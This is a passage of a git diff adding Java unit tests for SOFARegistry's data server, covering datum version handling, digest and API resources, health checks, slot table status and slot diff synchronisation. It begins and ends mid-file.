handler.localDatumStorage.get(pub.getDataInfoId() + 1).getPubMap().size(), 0); + + // get less than store's version + handler.localDatumStorage.put(pub); + long putV = handler.localDatumStorage.get(pub.getDataInfoId()).getVersion(); + request = request(Collections.singletonMap(pub.getDataInfoId(), v), 10); + resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertTrue(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.accept().getStatus()); + ret = (Map) resp.getData(); + Assert.assertEquals(ret.size(), 1); + retV = ret.get(pub.getDataInfoId()); + Assert.assertEquals(retV.getValue(), putV); + + // get more than store's version + v = new DatumVersion(DatumVersionUtil.nextId()); + request = request(Collections.singletonMap(pub.getDataInfoId(), v), 10); + resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertTrue(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.accept().getStatus()); + ret = (Map) resp.getData(); + Assert.assertEquals(ret.size(), 1); + retV = ret.get(pub.getDataInfoId()); + Assert.assertTrue(retV.getValue() > putV); + Assert.assertTrue(retV.getValue() > v.getValue()); + putV = handler.localDatumStorage.get(pub.getDataInfoId()).getVersion(); + Assert.assertEquals(retV.getValue(), putV); + } + + @Test + public void testHandleErrorSlotAccess() { + GetDataVersionsHandler handler = newHandler(); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 8888); + + GetDataVersionRequest request = request(Collections.emptyMap(), 1); + + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.moved()); + SlotAccessGenericResponse resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.moved().getStatus()); + + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.misMatch()); + resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.misMatch().getStatus()); + + when(handler.slotManager.checkSlotAccess(anyInt(), anyLong(), anyLong())) + .thenReturn(TestBaseUtils.migrating()); + resp = (SlotAccessGenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertEquals(resp.getSlotAccess().getStatus(), TestBaseUtils.migrating().getStatus()); + } + + private static GetDataVersionRequest request(Map versionMap, int slotId) { + return new GetDataVersionRequest("testDc", ServerEnv.PROCESS_ID, slotId, versionMap); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/resource/DataDigestResourceTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/resource/DataDigestResourceTest.java new file mode 100644 index 000000000..064684d91 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/resource/DataDigestResourceTest.java @@ -0,0 +1,129 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.resource; + +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.bolt.exchange.BoltExchange; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.alipay.sofa.registry.server.data.remoting.metaserver.MetaServerServiceImpl; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class DataDigestResourceTest { + + private DataDigestResource newResource() { + DataDigestResource resource = new DataDigestResource(); + resource.dataServerConfig = TestBaseUtils.newDataConfig("testDc"); + DatumCache datumCache = TestBaseUtils.newLocalDatumCache("testDc", true); + resource.datumCache = datumCache; + resource.boltExchange = Mockito.mock(BoltExchange.class); + resource.metaServerService = Mockito.mock(MetaServerServiceImpl.class); + return resource; + } + + @Test + public void testDatum() { + DataDigestResource resource = newResource(); + String count = resource.getDatumCount(); + Assert.assertTrue(count, count.contains("is 0")); + + Publisher pub = TestBaseUtils.createTestPublishers(10, 1).get(0); + resource.datumCache.getLocalDatumStorage().put(pub); + + Map map = + resource.getDatumByDataInfoId( + pub.getDataId(), pub.getGroup(), pub.getInstanceId(), "testDc"); + Assert.assertEquals(1, map.size()); + Datum datum = map.get("testDc"); + Assert.assertEquals(1, datum.getPubMap().size()); + Assert.assertEquals(pub, datum.getPubMap().get(pub.getRegisterId())); + + Map> mapMap = + resource.getPublishersByConnectId( + Collections.singletonMap("192.168.1.1:100", "192.168.1.2:200")); + Assert.assertEquals(0, mapMap.size()); + + mapMap = + resource.getPublishersByConnectId( + Collections.singletonMap( + pub.getSourceAddress().getAddressString(), + pub.getTargetAddress().getAddressString())); + Assert.assertEquals(1, mapMap.size()); + Assert.assertEquals(mapMap.get(pub.connectId().toString()).get(pub.getRegisterId()), pub); + + count = resource.getDatumCount(); + Assert.assertTrue(count, count.contains("is 1")); + + resource.datumCache = null; + count = resource.getDatumCount(); + Assert.assertTrue(count, count.contains("cache digest error")); + } + + @Test + public void testSessionList() { + DataDigestResource resource = newResource(); + // bolt server is null + Map> map = resource.getServerListAll("session"); + Assert.assertEquals(1, map.size()); + Assert.assertEquals(0, map.get(resource.dataServerConfig.getLocalDataCenter()).size()); + + Server server = Mockito.mock(Server.class); + Mockito.when(resource.boltExchange.getServer(resource.dataServerConfig.getPort())) + .thenReturn(server); + TestBaseUtils.MockBlotChannel channel = + TestBaseUtils.newChannel(resource.dataServerConfig.getPort(), "192.168.1.1", 12345); + Mockito.when(server.selectAvailableChannelsForHostAddress()) + .thenReturn(Collections.singletonMap("192.168.1.1", channel)); + map = resource.getServerListAll("session"); + Assert.assertEquals(1, map.size()); + List serverList = map.get(resource.dataServerConfig.getLocalDataCenter()); + Assert.assertEquals(1, serverList.size()); + Assert.assertEquals("192.168.1.1:12345", serverList.get(0)); + } + + @Test + public void testMetaList() { + DataDigestResource resource = newResource(); + // not meta leader + Map> map = resource.getServerListAll("meta"); + Assert.assertEquals(1, map.size()); + Assert.assertEquals(0, map.get(resource.dataServerConfig.getLocalDataCenter()).size()); + + Mockito.when(resource.metaServerService.getMetaServerLeader()).thenReturn("xxx"); + map = resource.getServerListAll("meta"); + Assert.assertEquals(1, map.size()); + List serverList = map.get(resource.dataServerConfig.getLocalDataCenter()); + Assert.assertEquals(1, serverList.size()); + Assert.assertEquals("xxx", serverList.get(0)); + } + + @Test + public void testServerListUnsupported() { + DataDigestResource resource = newResource(); + TestBaseUtils.assertException( + IllegalArgumentException.class, () -> resource.getServerListAll("data")); + TestBaseUtils.assertException( + IllegalArgumentException.class, () -> resource.getServerListAll("xx")); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/resource/DatumApiResourceTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/resource/DatumApiResourceTest.java new file mode 100644 index 000000000..34084a50b --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/resource/DatumApiResourceTest.java @@ -0,0 +1,219 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.resource; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.cache.CleanContinues; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.alipay.sofa.registry.server.data.remoting.sessionserver.handler.BatchPutDataHandler; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import java.util.Collections; +import java.util.Map; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; +import org.mockito.invocation.InvocationOnMock; +import org.mockito.stubbing.Answer; + +public class DatumApiResourceTest { + + private DatumApiResource newResource() { + DatumApiResource resource = new DatumApiResource(); + resource.dataServerConfig = TestBaseUtils.newDataConfig("testDc"); + DatumCache datumCache = TestBaseUtils.newLocalDatumCache("testDc", true); + resource.datumCache = datumCache; + resource.localDatumStorage = datumCache.getLocalDatumStorage(); + resource.slotManager = Mockito.mock(SlotManager.class); + resource.batchPutDataHandler = Mockito.mock(BatchPutDataHandler.class); + return resource; + } + + private DatumParam newParam(String dataInfoId) { + DatumParam param = new DatumParam(); + param.setDataInfoId(dataInfoId); + param.setPublisherRegisterId("testRegisterId"); + param.setPublisherCell("rz00a"); + param.setPublisherDataBox("testDataBox"); + param.setPublisherRegisterTimestamp(System.currentTimeMillis()); + param.setPublisherVersion(1); + return param; + } + + @Test + public void testGetNotEmpty() { + DatumApiResource resource = newResource(); + Mockito.when(resource.slotManager.slotOf(Mockito.anyString())).thenReturn(10); + Mockito.when(resource.slotManager.getSlot(Mockito.anyInt())) + .thenReturn(new Slot(10, "xxx", 1, Collections.emptyList())); + + Publisher pub = TestBaseUtils.createTestPublishers(10, 1).get(0); + DatumVersion v = resource.localDatumStorage.put(pub); + + DatumParam param = new DatumParam(); + param.setDataCenter("testDc"); + param.setDataInfoId(pub.getDataInfoId()); + + // get version + String msg = (String) resource.getDatumVersion(param); + Assert.assertTrue(msg, msg.contains("version:" + v.getValue())); + + Map versions = (Map) resource.getDatumVersions(param); + Assert.assertEquals(versions.size(), 1); + Assert.assertEquals(versions.get(pub.getDataInfoId()).longValue(), v.getValue()); + + Map sizes = (Map) resource.getDatumSizes(); + Assert.assertEquals(1, sizes.size()); + Assert.assertEquals(sizes.get("testDc").intValue(), 1); + } + + @Test + public void testAddDelete() { + final DatumApiResource resource = newResource(); + Mockito.when(resource.slotManager.slotOf(Mockito.anyString())).thenReturn(10); + Mockito.when(resource.slotManager.getSlot(Mockito.anyInt())) + .thenReturn(new Slot(10, "xxx", 1, Collections.emptyList())); + + Publisher pub = TestBaseUtils.createTestPublishers(10, 1).get(0); + resource.localDatumStorage.put(pub); + + DatumParam param = newParam(pub.getDataInfoId()); + Datum datum = resource.localDatumStorage.get(pub.getDataInfoId()); + Publisher pubAdd = resource.buildPublisher(datum, param); + + CommonResponse response = resource.get(param); + Assert.assertTrue(response.isSuccess()); + Assert.assertTrue(response.getMessage(), response.getMessage().contains("size=1")); + + resource.dataServerConfig.setEnableTestApi(true); + // batchHandler is mock, put the pub directly + resource.localDatumStorage.put(pubAdd); + response = resource.addPub(param); + Assert.assertTrue(response.isSuccess()); + Assert.assertTrue(response.getMessage(), response.getMessage().contains("size=2")); + + // unable api + resource.dataServerConfig.setEnableTestApi(false); + response = resource.addPub(param); + Assert.assertFalse(response.isSuccess()); + + response = resource.delete(param); + Assert.assertFalse(response.isSuccess()); + + resource.dataServerConfig.setEnableTestApi(true); + response = resource.delete(param); + Assert.assertTrue(response.isSuccess()); + Assert.assertTrue(response.getMessage(), response.getMessage().contains("size=0")); + + param.setDataInfoId("testDataIdNotExist"); + response = resource.delete(param); + Assert.assertFalse(response.isSuccess()); + Assert.assertTrue(response.getMessage().contains("not found")); + + response = resource.deletePub(param); + Assert.assertFalse(response.isSuccess()); + Assert.assertTrue(response.getMessage().contains("not found")); + + param.setDataInfoId(pub.getDataInfoId()); + resource.localDatumStorage.put(pub); + response = resource.deletePub(param); + Assert.assertFalse(response.isSuccess()); + Assert.assertTrue(response.getMessage(), response.getMessage().contains("No pub of")); + + param.setPublisherRegisterId(pub.getRegisterId()); + // mock batchHandler, not delete the pub + response = resource.deletePub(param); + Assert.assertTrue(response.isSuccess()); + Assert.assertTrue(response.getMessage(), response.getMessage().contains("size=1")); + + Mockito.when(resource.batchPutDataHandler.doHandle(Mockito.anyObject(), Mockito.anyObject())) + .thenAnswer( + new Answer() { + public Object answer(InvocationOnMock var1) throws Throwable { + for (int i = 0; i < SlotConfig.SLOT_NUM; i++) { + resource.localDatumStorage.clean(i, ServerEnv.PROCESS_ID, CleanContinues.ALWAYS); + } + return null; + } + }); + response = resource.deletePub(param); + Assert.assertTrue(response.getMessage(), response.isSuccess()); + Assert.assertTrue(response.getMessage(), response.getMessage().contains("size=0")); + } + + @Test + public void testGetEmpty() { + DatumApiResource resource = newResource(); + + // get null + CommonResponse response = resource.get(null); + Assert.assertFalse(response.isSuccess()); + + // get notFound + DatumParam param = new DatumParam(); + param.setDataInfoId("testDataInfoId"); + response = resource.get(param); + Assert.assertFalse(response.isSuccess()); + Assert.assertTrue(response.getMessage().contains("not found")); + + // get version + String msg = (String) resource.getDatumVersion(param); + Assert.assertTrue(msg.contains("version:null")); + + param.setDataCenter("testDc"); + msg = (String) resource.getDatumVersion(param); + Assert.assertTrue(msg.contains("version:null")); + + // get remote datum version + param = new DatumParam(); + Map versions = (Map) resource.getDatumVersions(param); + Assert.assertTrue(versions.isEmpty()); + + param.setDataCenter("testDc"); + versions = (Map) resource.getDatumVersions(param); + Assert.assertTrue(versions.isEmpty()); + + // unsupported get remote + TestBaseUtils.assertException( + UnsupportedOperationException.class, () -> resource.getRemoteDatumVersions(null)); + + Map sizes = (Map) resource.getDatumSizes(); + Assert.assertEquals(1, sizes.size()); + Assert.assertEquals(sizes.get("testDc").intValue(), 0); + } + + @Test + public void testBuild() { + DatumApiResource resource = newResource(); + DatumParam param = newParam("testDataInfoId"); + param.setPublisherConnectId("192.168.1.1"); + TestBaseUtils.assertException( + IllegalArgumentException.class, () -> resource.buildPublisher(null, param)); + + param.setPublisherConnectId("192.168.1.1:123_192.168.1.2:456"); + Publisher publisher = resource.buildPublisher(null, param); + Assert.assertEquals(param.getDataInfoId(), publisher.getDataInfoId()); + Assert.assertEquals("192.168.1.1:123", publisher.getSourceAddress().getAddressString()); + Assert.assertEquals("192.168.1.2:456", publisher.getTargetAddress().getAddressString()); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/resource/HealthResourceTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/resource/HealthResourceTest.java new file mode 100644 index 000000000..d84d5d34e --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/resource/HealthResourceTest.java @@ -0,0 +1,50 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.resource; + +import com.alipay.sofa.registry.server.data.bootstrap.DataServerBootstrap; +import javax.ws.rs.core.Response; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class HealthResourceTest { + @Test + public void test() { + HealthResource resource = new HealthResource(); + resource.dataServerBootstrap = Mockito.mock(DataServerBootstrap.class); + resource.init(); + Response resp = resource.checkHealth(); + Assert.assertEquals(resp.getStatus(), Response.Status.INTERNAL_SERVER_ERROR.getStatusCode()); + + Mockito.when(resource.dataServerBootstrap.getServerForSessionStarted()).thenReturn(true); + resp = resource.checkHealth(); + Assert.assertEquals(resp.getStatus(), Response.Status.INTERNAL_SERVER_ERROR.getStatusCode()); + + Mockito.when(resource.dataServerBootstrap.getServerForDataSyncStarted()).thenReturn(true); + resp = resource.checkHealth(); + Assert.assertEquals(resp.getStatus(), Response.Status.INTERNAL_SERVER_ERROR.getStatusCode()); + + Mockito.when(resource.dataServerBootstrap.getHttpServerStarted()).thenReturn(true); + resp = resource.checkHealth(); + Assert.assertEquals(resp.getStatus(), Response.Status.INTERNAL_SERVER_ERROR.getStatusCode()); + + Mockito.when(resource.dataServerBootstrap.getSchedulerStarted()).thenReturn(true); + resp = resource.checkHealth(); + Assert.assertEquals(resp.getStatus(), Response.Status.OK.getStatusCode()); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/resource/SlotTableStatusResourceTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/resource/SlotTableStatusResourceTest.java new file mode 100644 index 000000000..b30ca4210 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/resource/SlotTableStatusResourceTest.java @@ -0,0 +1,84 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.resource; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.Tuple; +import com.alipay.sofa.registry.common.model.slot.BaseSlotStatus; +import com.alipay.sofa.registry.common.model.slot.FollowerSlotStatus; +import com.alipay.sofa.registry.common.model.slot.LeaderSlotStatus; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.google.common.collect.Lists; +import java.util.List; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class SlotTableStatusResourceTest { + @Test + public void test() { + SlotTableStatusResource resource = new SlotTableStatusResource(); + resource.slotManager = Mockito.mock(SlotManager.class); + + LeaderSlotStatus leaderSlotStatus = + new LeaderSlotStatus(10, 20, "xxx", BaseSlotStatus.LeaderStatus.UNHEALTHY); + FollowerSlotStatus followerSlotStatus = + new FollowerSlotStatus( + 11, 30, "yyy", System.currentTimeMillis(), System.currentTimeMillis()); + + List list = Lists.newArrayList(leaderSlotStatus, followerSlotStatus); + Mockito.when(resource.slotManager.getSlotTableEpochAndStatuses()) + .thenReturn(Tuple.of(100L, list)); + + GenericResponse resp = resource.getSlotTableSyncTaskStatus(); + Assert.assertTrue(resp.isSuccess()); + SlotTableStatusResource.SlotTableSyncTaskStatus status = + (SlotTableStatusResource.SlotTableSyncTaskStatus) resp.getData(); + + Assert.assertEquals(status.getEpoch(), 100); + Assert.assertEquals(status.isCurrentSlotTableStable(), false); + Assert.assertEquals(status.getSlotStatuses().get(0), list.get(0)); + Assert.assertEquals(status.getSlotStatuses().get(1), list.get(1)); + + list.set(0, new LeaderSlotStatus(10, 20, "xxx", BaseSlotStatus.LeaderStatus.HEALTHY)); + + resp = resource.getSlotTableSyncTaskStatus(); + Assert.assertTrue(resp.isSuccess()); + status = (SlotTableStatusResource.SlotTableSyncTaskStatus) resp.getData(); + Assert.assertEquals(status.getEpoch(), 100); + Assert.assertEquals(status.isCurrentSlotTableStable(), true); + Assert.assertEquals(status.getSlotStatuses().get(0), list.get(0)); + Assert.assertEquals(status.getSlotStatuses().get(1), list.get(1)); + + list.set( + 1, + new FollowerSlotStatus( + 11, + 30, + "yyy", + System.currentTimeMillis(), + System.currentTimeMillis() - SlotTableStatusResource.MAX_SYNC_GAP - 1)); + + resp = resource.getSlotTableSyncTaskStatus(); + Assert.assertTrue(resp.isSuccess()); + status = (SlotTableStatusResource.SlotTableSyncTaskStatus) resp.getData(); + Assert.assertEquals(status.getEpoch(), 100); + Assert.assertEquals(status.isCurrentSlotTableStable(), false); + Assert.assertEquals(status.getSlotStatuses().get(0), list.get(0)); + Assert.assertEquals(status.getSlotStatuses().get(1), list.get(1)); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/slot/SlotDiffSyncerTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/slot/SlotDiffSyncerTest.java new file mode 100644 index 000000000..2650e4f7a --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/slot/SlotDiffSyncerTest.java @@ -0,0 +1,547 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.slot; + +import static org.mockito.Matchers.anyString; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffDigestRequest; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffDigestResult; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffPublisherRequest; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffPublisherResult; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.remoting.exchange.message.Response; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.cache.DatumStorage; +import com.alipay.sofa.registry.server.data.cache.LocalDatumStorage; +import com.alipay.sofa.registry.server.data.change.DataChangeEventCenter; +import com.alipay.sofa.registry.server.data.lease.SessionLeaseManager; +import com.alipay.sofa.registry.server.data.remoting.DataNodeExchanger; +import com.alipay.sofa.registry.server.data.remoting.SessionNodeExchanger; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.remoting.ClientSideExchanger; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Matchers; + +public class SlotDiffSyncerTest { + private static final SyncContinues TRUE = + new SyncContinues() { + @Override + public boolean continues() { + return true; + } + }; + + private static final SyncContinues FALSE = + new SyncContinues() { + @Override + public boolean continues() { + return false; + } + }; + + @Test + public void testPick() { + Map summaryMap = Maps.newLinkedHashMap(); + for (int i = 0; i < 10; i++) { + DatumSummary summary0 = TestBaseUtils.newDatumSummary(0); + summaryMap.put(summary0.getDataInfoId(), summary0); + } + DatumSummary summary1 = TestBaseUtils.newDatumSummary(2); + summaryMap.put(summary1.getDataInfoId(), summary1); + Map picks = SlotDiffSyncer.pickSummaries(summaryMap, 5); + // empty consume 1 publisher budget + Assert.assertEquals(picks.size(), 5); + for (DatumSummary summary : picks.values()) { + Assert.assertEquals(summary.size(), 0); + } + + picks = SlotDiffSyncer.pickSummaries(summaryMap, 11); + Assert.assertEquals(picks.size(), 11); + // get all publishers in datum + Assert.assertEquals(picks.get(summary1.getDataInfoId()).size(), 2); + } + + @Test + public void testSyncDigestResp() { + SlotDiffSyncer syncer = newSyncer(); + Assert.assertNull( + syncer.processSyncDigestResp(10, failDigestResp(), null, Collections.emptyMap())); + Assert.assertNull(syncer.processSyncDigestResp(10, null, null, Collections.emptyMap())); + Assert.assertTrue( + syncer + .processSyncDigestResp(10, emptyDigestResp(), null, Collections.emptyMap()) + .isEmpty()); + + DatumStorage storage = syncer.getDatumStorage(); + Publisher publisher1 = TestBaseUtils.createTestPublisher("dataId1"); + storage.put(publisher1); + Publisher publisher2 = TestBaseUtils.createTestPublisher("dataId2"); + storage.put(publisher2); + Publisher publisher3 = TestBaseUtils.createTestPublisher("dataId3"); + storage.put(publisher3); + + GenericResponse resp = + newDigestResp( + Lists.newArrayList(publisher1.getDataInfoId()), + Lists.newArrayList(publisher2.getDataInfoId()), + Lists.newArrayList(publisher3.getDataInfoId())); + Map summaryMap = Maps.newHashMap(); + summaryMap.put( + publisher1.getDataInfoId(), TestBaseUtils.newDatumSummary(3, publisher1.getDataInfoId())); + summaryMap.put( + publisher3.getDataInfoId(), TestBaseUtils.newDatumSummary(2, publisher3.getDataInfoId())); + // try remove publisher3, but not match register.version + Assert.assertFalse(syncer.processSyncDigestResp(10, resp, null, summaryMap).isEmpty()); + Datum datum1 = storage.get(publisher3.getDataInfoId()); + Assert.assertTrue(datum1.publisherSize() != 0); + + // remove publisher3 + summaryMap.put( + publisher3.getDataInfoId(), + new DatumSummary( + publisher3.getDataInfoId(), + Collections.singletonMap(publisher3.getRegisterId(), publisher3.registerVersion()))); + DataSlotDiffDigestResult result = syncer.processSyncDigestResp(10, resp, null, summaryMap); + Assert.assertFalse(result.isEmpty()); + Datum datum2 = storage.get(publisher3.getDataInfoId()); + Assert.assertTrue(datum2.publisherSize() == 0); + Assert.assertTrue(datum2.getVersion() > datum1.getVersion()); + } + + @Test + public void testSyncPublisherResp() { + SlotDiffSyncer syncer = newSyncer(); + Assert.assertNull( + syncer.processSyncPublisherResp(10, failPublisherResp(), null, Collections.emptyMap())); + Assert.assertNull(syncer.processSyncPublisherResp(10, null, null, Collections.emptyMap())); + Assert.assertTrue( + syncer + .processSyncPublisherResp(10, emptyPublisherResp(), null, Collections.emptyMap()) + .isEmpty()); + + DatumStorage storage = syncer.getDatumStorage(); + Publisher publisher1 = TestBaseUtils.createTestPublisher("dataId1"); + storage.put(publisher1); + Publisher publisher2 = TestBaseUtils.createTestPublisher("dataId2"); + storage.put(publisher2); + Publisher publisher3 = TestBaseUtils.createTestPublisher("dataId3"); + storage.put(publisher3); + + Map summaryMap = Maps.newHashMap(); + summaryMap.put( + publisher1.getDataInfoId(), + new DatumSummary( + publisher1.getDataInfoId(), + Collections.singletonMap(publisher1.getRegisterId(), publisher1.registerVersion()))); + summaryMap.put( + publisher2.getDataInfoId(), TestBaseUtils.newDatumSummary(3, publisher2.getDataInfoId())); + summaryMap.put( + publisher3.getDataInfoId(), + new DatumSummary( + publisher3.getDataInfoId(), + Collections.singletonMap(publisher3.getRegisterId(), publisher3.registerVersion()))); + + publisher1 = TestBaseUtils.cloneBase(publisher1); + publisher1.setVersion(publisher1.getVersion() + 1); + GenericResponse resp = + newPublishResp( + false, + Collections.singletonMap( + publisher1.getDataInfoId(), Collections.singletonList(publisher1)), + Collections.singletonMap( + publisher3.getDataInfoId(), Collections.singletonList(publisher3.getRegisterId()))); + + Datum datum1 = storage.get(publisher1.getDataInfoId()); + Datum datum3 = storage.get(publisher3.getDataInfoId()); + Assert.assertTrue(datum1.publisherSize() == 1); + Assert.assertTrue(datum3.publisherSize() == 1); + + DataSlotDiffPublisherResult result = + syncer.processSyncPublisherResp(10, resp, null, summaryMap); + Assert.assertFalse(result.isEmpty()); + + Datum datum1_1 = storage.get(publisher1.getDataInfoId()); + Assert.assertTrue(datum1_1.publisherSize() == 1); + Assert.assertEquals(datum1_1.getPubMap().get(publisher1.getRegisterId()), publisher1); + Assert.assertTrue(datum1_1.getVersion() > datum1.getVersion()); + + Datum datum3_3 = storage.get(publisher3.getDataInfoId()); + Assert.assertTrue(datum3_3.publisherSize() == 0); + Assert.assertTrue(datum3_3.getVersion() > datum3.getVersion()); + } + + @Test + public void testSyncSession() { + MockSync mockSync = mockSync(10, "testDc"); + SlotDiffSyncer syncer = mockSync.syncer; + LocalDatumStorage storage = (LocalDatumStorage) syncer.getDatumStorage(); + List p1 = mockSync.p1; + List p2 = mockSync.p2; + List p3 = mockSync.p3; + List p4 = mockSync.p4; + + // sync failed or empty + SessionNodeExchanger exchanger = + mockExchange(SessionNodeExchanger.class, null, DataSlotDiffDigestRequest.class, null, null); + Assert.assertFalse(syncer.syncSession(10, ServerEnv.IP, exchanger, 10, TRUE)); + + exchanger = + mockExchange( + SessionNodeExchanger.class, + failDigestResp(), + DataSlotDiffDigestRequest.class, + null, + null); + Assert.assertFalse(syncer.syncSession(10, ServerEnv.IP, exchanger, 10, TRUE)); + + exchanger = + mockExchange( + SessionNodeExchanger.class, + emptyDigestResp(), + DataSlotDiffDigestRequest.class, + null, + null); + Assert.assertTrue(syncer.syncSession(10, ServerEnv.IP, exchanger, 10, TRUE)); + + // update p1.0, remove p2.0, remove p3.all, add p4 + GenericResponse digestResp = + newDigestResp( + Lists.newArrayList(p1.get(0).getDataInfoId(), p2.get(0).getDataInfoId()), + Collections.singletonList(p4.get(0).getDataInfoId()), + Collections.singletonList(p3.get(0).getDataInfoId())); + + Publisher p1Update = TestBaseUtils.cloneBase(p1.get(0)); + 